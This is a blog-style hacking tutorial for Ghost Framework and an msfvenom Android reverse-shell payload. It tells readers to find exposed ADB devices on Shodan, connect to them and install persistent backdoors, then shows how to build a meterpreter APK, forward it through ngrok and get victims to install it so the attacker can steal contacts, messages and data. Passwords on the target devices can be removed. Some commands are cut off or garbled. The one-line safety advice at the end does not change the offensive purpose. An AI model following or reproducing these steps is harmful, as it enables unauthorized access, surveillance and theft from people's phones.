You have landed at the right place as we have covered step by step how to exploit Android ADB to get the long-term connection back to the attacker machine. As an attacker machine one can use Kali Linux, exploit, and set up a back door channel once the android devices have been hacked. This can be achieved with the Ghost Framework Download that is available for Android and Windows. We have also included a tutorial on installation and usage for you in Kali Linux and Termux.
What is Ghost Framework
This is not a hacking tool and to be honest, we are not going to hack any android device, this is an Android post-exploitation that is used to exploit Android Debug Bridge in order to remotely access the device. So, this is a tool that provides a consistent connection and works as a backdoor.
Now, for all who do not know what ADB is, it is a feature or command-line tool released by Android with the purpose to remotely connect as well as operate Android devices but security thefts are able to exploit such features and connect hacked devices.
With this perform tasks which are not suitable for everyday use such as:
- Install application outside Playstore.
- Provides access to many features which are hidden.
- Bring up a UNIX shell so that one can issue commands on the device directly.
Why use Ghost Framework (3 reasons)
- Very simple and effective UI interface
This is simple yet easy to understand and quite easy to master it.
2. Allows you to bypass and remove passwords
It can be used to remove a password in case one forgets it.
3. Provides full shell-level access
It can be used to access the device’s shell without using OpenSSH or any other protocol.
How To Install Ghost Framework in Kali Linux or Termux
We begin by installing it in Kali Linux.
- Download or clone it with help of the git command.
git clone
- Once downloaded, get into the directory.
- Here you can see files and directories; this is required to install the program.
- Once done, run the program.
- The ghost framework shares command similar to Metasploit, therefore we can execute those commands like help to see all options.
So, here one can see all commands with descriptions.
Now, we are going to use the connect command with purpose to connect remote device as we mentioned earlier which exploits ADB. Make sure that ADB port 5555 is open.
Open the device, if you have hacked the device.
So, for demonstration, we shall look into Shodan for ADB-enabled devices.
After this pick IP to connect.
Connect IP Address / Example: Connect
We are now connected which means we have got another session and can reconnect to the hacked device over again as long as the port is open.
For now, we can perform many things such as:
- Record phone screen.
- Install or uninstall any application.
- Perform port forwarding to create any reverse connection.
- Remove device password.
Sys info and many other can be done but most importantly one can install backdoor for future and to have persistent connection.
This is how it exploits ADB and provides a good connection to any android device remotely.
READ ALSO: Download Hack App Data Pro APK (700 KB).
How to use Ghost Framework (A Step-by-step guide)
Install Ngrok
- Install Ngrok on the Kali machine.
- Fire it up, browse Ngrok to access the official site.
- First, make an account. Head towards sign-up and fill in details.
Don’t use email which has access to any private information or work email. Try using temporary emails when performing penetration testing. Please use a temporary email that can be recycled afterward.
- Go to the download directory, here you shall find downloaded files.
- Unzip the file and use unzip command to extract it.
READ ALSO: Freedom APK No Root Download.
Now it is time to take the generated token
- Once you have un-zipped, save the token which was given to the account.
- Copy and paste the token and paste into the terminal.
Make sure to paste it in the same directory where you have Ngrok.
For now, you are set to use this tool, in terminal type following:
SecuredYou# ./ngrok tcp [Port no:]
Forwarding over here specifies TCP tunnel which it has created, the connection has bound to Localhost at port 4242. Using msfvenom we are going to generate a malicious payload. You should read our list of Metasploit Commands that can also be used in Termux.
- Type in the following command:
SecuredYou# msfvenom -p android/meterpreter/reverse_tcp LPORT=10900 R > /root/Desktop/Shaheer/payload.apk
Reversing the TCP handle
- Start Metasploit-framework.
- Then set exploit as multi-handler, Lhost to Localhost like, Lport to 4242 and run the exploit.
Retrieve meterpreter session from the victim device
- To get this on the device, we shall upload this on any cloud service. You can use any such as Google Drive.
- Browse this link on the phone, it shall download a ZIP file of the payload. Unzip and install it on your device.
Make sure to allow the option to get it from third-party sources.
- Once installed, run the app from an Android phone, we got a session in our Kali machine.
This is how all is done and get access over the net rather than LAN. Once you have got the session, an attacker can easily have:
- Access to information.
- Steal contacts, messages, data, and much more.
Therefore, it is important to have access to a phone device which is quite easy when there is no awareness.
This exploit has been tested on version 9.0 which is not old and still used by many people. Make sure to secure your device by not installing any app from an unknown source, try to read and examine its source code to have an idea of either it is safe or not. There is also a video version of the above tutorial for preference.
RECOMMENDED: Termux Commands for Wifi and Facebook Password Hacking.
Ghost Framework Alternatives
Ghost Framework Download 2022 – Android Remote Access
Remote Administration Tools have been the go-to for remote access on devices for the past two decades. Ghost Framework for Android or Windows Download allows you to access any device remotely by exploiting the ADB protocol. This is a very stealth framework that has been out for a while but not much coverage was made. We have also included a Ghost Framework tutorial to get you started with installation and using it.
Release: 6.0.